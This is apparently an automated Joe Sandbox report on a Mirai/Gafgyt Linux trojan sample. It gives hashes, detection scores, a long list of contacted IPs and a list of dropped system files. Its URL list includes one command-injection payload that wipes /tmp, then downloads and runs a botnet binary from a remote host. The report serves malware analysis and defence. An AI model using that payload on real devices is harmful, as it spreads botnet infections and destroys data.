
01oHMcUgUM

Status: finished
Submission Time: 2022-01-14 23:48:18 +01:00
Malicious
Spreader
Trojan
Gafgyt Mirai

Tags

  • 32
  • elf
  • mirai
  • renesas

Details

  • Analysis ID:
    553470
  • API (Web) ID:
    920989
  • Analysis Started:
    2022-01-15 00:13:48 +01:00
  • Analysis Finished:
    2022-01-15 00:20:26 +01:00
  • MD5:
    14c3173a21e8dd262999e2ab8c2833f4
  • SHA1:
    efc2c18ac9a0f9dab71930037496cc676fa18bea
  • SHA256:
    dec1840b49d9d7303369f1ce3efec379e86bd7095a4a2630b2c3df18ab1a12f4
  • Technologies:

Joe Sandbox

Engine Download Report Detection Info
malicious
Score: 100
System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

malicious
Score: 32/59
malicious
Score: 27/43

IPs

IP Country Detection
109.166.166.137
Romania
142.207.206.184
Canada
211.175.106.95
Korea Republic of
79.151.69.70
Spain
158.64.236.183
Luxembourg
80.250.181.202
Russian Federation
78.224.112.197
France
189.7.143.4
Brazil
1.32.222.215
Singapore
62.173.159.136
Russian Federation
159.41.147.230
United States
166.67.41.254
United States
156.38.69.221
Togo
138.153.211.93
United States
179.89.147.18
Brazil
67.59.185.234
United States
92.224.144.33
Germany
107.216.78.174
United States
144.153.205.195
United States
138.145.133.158
United States
123.220.43.229
Japan
91.10.214.233
Germany
69.60.247.77
Canada
77.140.167.126
France
204.85.48.52
United States
163.65.249.252
France
25.92.46.249
United Kingdom
161.169.114.7
United States
27.209.227.107
China
77.213.148.9
Denmark
140.51.225.181
United States
183.215.247.78
China
216.182.81.190
United States
70.66.117.174
Canada
39.152.182.206
China
174.76.47.162
United States
186.100.192.32
Argentina
89.183.195.88
Germany
76.162.184.197
United States
182.62.236.63
Malaysia
114.165.183.221
Japan
168.48.190.197
United States
100.48.158.49
United States
20.170.115.52
United States
73.194.93.58
United States
37.17.161.143
Hungary
207.163.26.164
United States
42.166.156.227
China
114.198.53.184
Australia
180.221.186.64
Japan
189.127.5.186
Brazil
1.217.99.233
Korea Republic of
121.87.53.6
Japan
103.70.12.25
unknown
106.6.195.143
China
113.216.47.10
Korea Republic of
152.167.122.118
Dominican Republic
185.72.169.17
Belgium
147.86.201.172
Switzerland
180.88.214.83
China
218.57.153.246
China
210.1.238.126
Japan
101.105.64.222
China
149.154.137.144
Russian Federation
180.166.5.121
China
161.4.230.66
Norway
189.96.247.130
Brazil
90.218.34.202
United Kingdom
140.177.25.158
United States
201.159.149.209
Brazil
104.86.5.165
United States
89.165.215.214
Romania
86.52.29.30
Denmark
200.102.167.34
Brazil
77.173.154.71
Netherlands
223.64.65.169
China
119.192.231.125
Korea Republic of
82.237.229.57
France
48.79.19.123
United States
208.27.38.166
United States
201.123.121.205
Mexico
19.174.160.178
United States
116.173.112.248
China
158.86.215.90
United States
109.114.40.25
Italy
57.147.18.91
Belgium
201.188.206.215
Chile
144.130.247.126
Australia
188.42.90.194
Luxembourg
220.241.36.28
Hong Kong
170.54.127.169
United States
125.36.135.148
China
60.89.247.251
Japan
76.73.122.174
United States
147.200.0.247
Australia
17.181.203.195
United States
46.7.53.244
Ireland
141.100.168.19
Germany
104.119.90.57
United States
24.211.135.100
United States

Domains

Name IP Detection
daisy.ubuntu.com
162.213.33.132

URLs

Name Detection
https://www.rsyslog.com
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name File Type Hashes Detection
/run/systemd/journal/streams/.#9:81743qgtbXw
ASCII text
#
/run/systemd/seats/.#seat04CQDsK
ASCII text
#
/run/systemd/journal/streams/.#9:831786sLlKu
ASCII text
#
/run/systemd/journal/streams/.#9:83087NTgMFw
ASCII text
#
/run/systemd/journal/streams/.#9:83035HPMT3w
ASCII text
#
/run/systemd/journal/streams/.#9:82945WjqdUw
ASCII text
#
/run/systemd/journal/streams/.#9:82794DXmhQj
ASCII text
#
/run/systemd/journal/streams/.#9:8279311ugqj
ASCII text
#
/run/systemd/journal/streams/.#9:827917N8ISi
ASCII text
#
/run/systemd/journal/streams/.#9:82782PURJkg
ASCII text
#
/run/systemd/journal/streams/.#9:82781swJnKg
ASCII text
#
/run/systemd/journal/streams/.#9:82299MKzupu
ASCII text
#
/run/systemd/journal/streams/.#9:82272ahUERw
ASCII text
#
/run/systemd/seats/.#seat0H9dzBL
ASCII text
#
/run/systemd/journal/streams/.#9:81742lJslft
ASCII text
#
/run/systemd/journal/streams/.#9:81741EnHQju
ASCII text
#
/run/systemd/journal/streams/.#9:817349fsQgv
ASCII text
#
/run/systemd/journal/streams/.#9:81733hWRT7s
ASCII text
#
/run/systemd/journal/streams/.#9:81732G2tIgt
ASCII text
#
/run/systemd/journal/streams/.#9:81359JlzJ2m
ASCII text
#
/run/systemd/journal/streams/.#9:81337vQY44j
ASCII text
#
/run/systemd/journal/streams/.#9:81206mUhmIm
ASCII text
#
/run/systemd/journal/streams/.#9:81205Kspzyj
ASCII text
#
/run/systemd/journal/streams/.#9:81165j2ca7j
ASCII text
#
/run/systemd/journal/streams/.#9:81164oDCsPl
ASCII text
#
/run/utmp
data
#
/var/cache/man/fr.ISO8859-1/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/fi/index.db.OCAabv
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/fi/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/es/index.db.ftENpx
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/es/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/de/index.db.mS9vnv
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/de/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/da/index.db.zlxt2v
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/da/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/cs/index.db.lLtQIt
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/cs/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/var/cache/man/5241
GNU dbm 1.x or ndbm database, little endian, 64-bit
#
/run/systemd/journal/streams/.#9:811421HoHOk
ASCII text
#
/run/user/1000/pulse/pid
ASCII text
#
/run/systemd/users/.#127vfJmuM
ASCII text
#
/run/systemd/users/.#127uVfpoL
ASCII text
#
/run/systemd/users/.#127rKJxhO
ASCII text
#
/run/systemd/users/.#127kPNxmK
ASCII text
#
/run/systemd/users/.#127fQG1WL
ASCII text
#
/run/systemd/users/.#1272qAm2L
ASCII text
#
/run/systemd/seats/.#seat0iylKrM
ASCII text
#
/run/systemd/seats/.#seat0hYBHeC
ASCII text
#
/run/systemd/seats/.#seat0QFSyUi
ASCII text
#
/run/systemd/seats/.#seat0PEg28l
ASCII text
#
/run/systemd/journal/streams/.#9:76081clZZ9i
ASCII text
#
/run/systemd/journal/streams/.#9:78276zDHZrg
ASCII text
#
/run/systemd/journal/streams/.#9:78274LDLJsc
ASCII text
#
/run/systemd/journal/streams/.#9:77301zGjk2l
ASCII text
#
/run/systemd/journal/streams/.#9:77200qPMPln
ASCII text
#
/run/systemd/journal/streams/.#9:76673E90Zuj
ASCII text
#
/run/systemd/journal/streams/.#9:76672LfWnBk
ASCII text
#
/run/systemd/journal/streams/.#9:76642vnmg0j
ASCII text
#
/run/systemd/journal/streams/.#9:766405NJjXl
ASCII text
#
/run/systemd/journal/streams/.#9:76600QiThSk
ASCII text
#
/run/systemd/journal/streams/.#9:764780U9kwk
ASCII text
#
/run/systemd/journal/streams/.#9:76267GBzanj
ASCII text
#
/run/systemd/journal/streams/.#9:76098jnuUhk
ASCII text
#
/run/systemd/journal/streams/.#9:78293WpfxMc
ASCII text
#
/run/systemd/journal/streams/.#9:76076bQJlgl
ASCII text
#
/run/systemd/journal/streams/.#9:76053w7M9ej
ASCII text
#
/run/systemd/journal/streams/.#9:760345DYx4k
ASCII text
#
/run/systemd/journal/streams/.#9:75845smPTSk
ASCII text
#
/run/systemd/journal/streams/.#9:75484c3XBfj
ASCII text
#
/run/systemd/journal/streams/.#9:75481Lxxupj
ASCII text
#
/run/systemd/journal/streams/.#9:74684JG46el
ASCII text
#
/run/systemd/journal/streams/.#9:74683YKFMTi
ASCII text
#
/run/gdm3.pid
ASCII text
#
/proc/5534/oom_score_adj
very short file (no magic)
#
/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source
ASCII text
#
/run/systemd/journal/streams/.#9:7863030D3P6
ASCII text
#
/run/systemd/journal/streams/.#9:811419Lx59l
ASCII text
#
/run/systemd/journal/streams/.#9:81139GDlhEm
ASCII text
#
/run/systemd/journal/streams/.#9:811385LvOpm
ASCII text
#
/run/systemd/journal/streams/.#9:81135w8hm8l
ASCII text
#
/run/systemd/journal/streams/.#9:81120QtLPIl
ASCII text
#
/run/systemd/journal/streams/.#9:80506DvLsnn
ASCII text
#
/run/systemd/journal/streams/.#9:804992fV4Rn
ASCII text
#
/run/systemd/journal/streams/.#9:78734sHl0y6
ASCII text
#
/run/systemd/journal/streams/.#9:78733CI9qC7
ASCII text
#
/run/systemd/journal/streams/.#9:78725MnkSK5
ASCII text
#
/run/systemd/journal/streams/.#9:78723Liskd5
ASCII text
#
/run/systemd/journal/streams/.#9:78716wFt094
ASCII text
#
/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink
ASCII text
#
/run/systemd/journal/streams/.#9:78625WJpbu4
ASCII text
#
/run/systemd/journal/streams/.#9:78624OMxoR5
ASCII text
#
/run/systemd/journal/streams/.#9:78612NiaeS7
ASCII text
#
/run/systemd/journal/streams/.#9:78606qeBKb5
ASCII text
#
/run/systemd/journal/streams/.#9:78593XYklN6
ASCII text
#
/run/systemd/journal/streams/.#9:785543XKjm3
ASCII text
#
/run/systemd/journal/streams/.#9:78313lnmgOd
ASCII text
#
/run/systemd/journal/streams/.#9:783052wN6gf
ASCII text
#
/run/systemd/journal/streams/.#9:78304zOoGqe
ASCII text
#
/run/systemd/journal/streams/.#9:78303JMC4Wf
ASCII text
#
/run/systemd/journal/streams/.#9:78294tJWk2e
ASCII text
#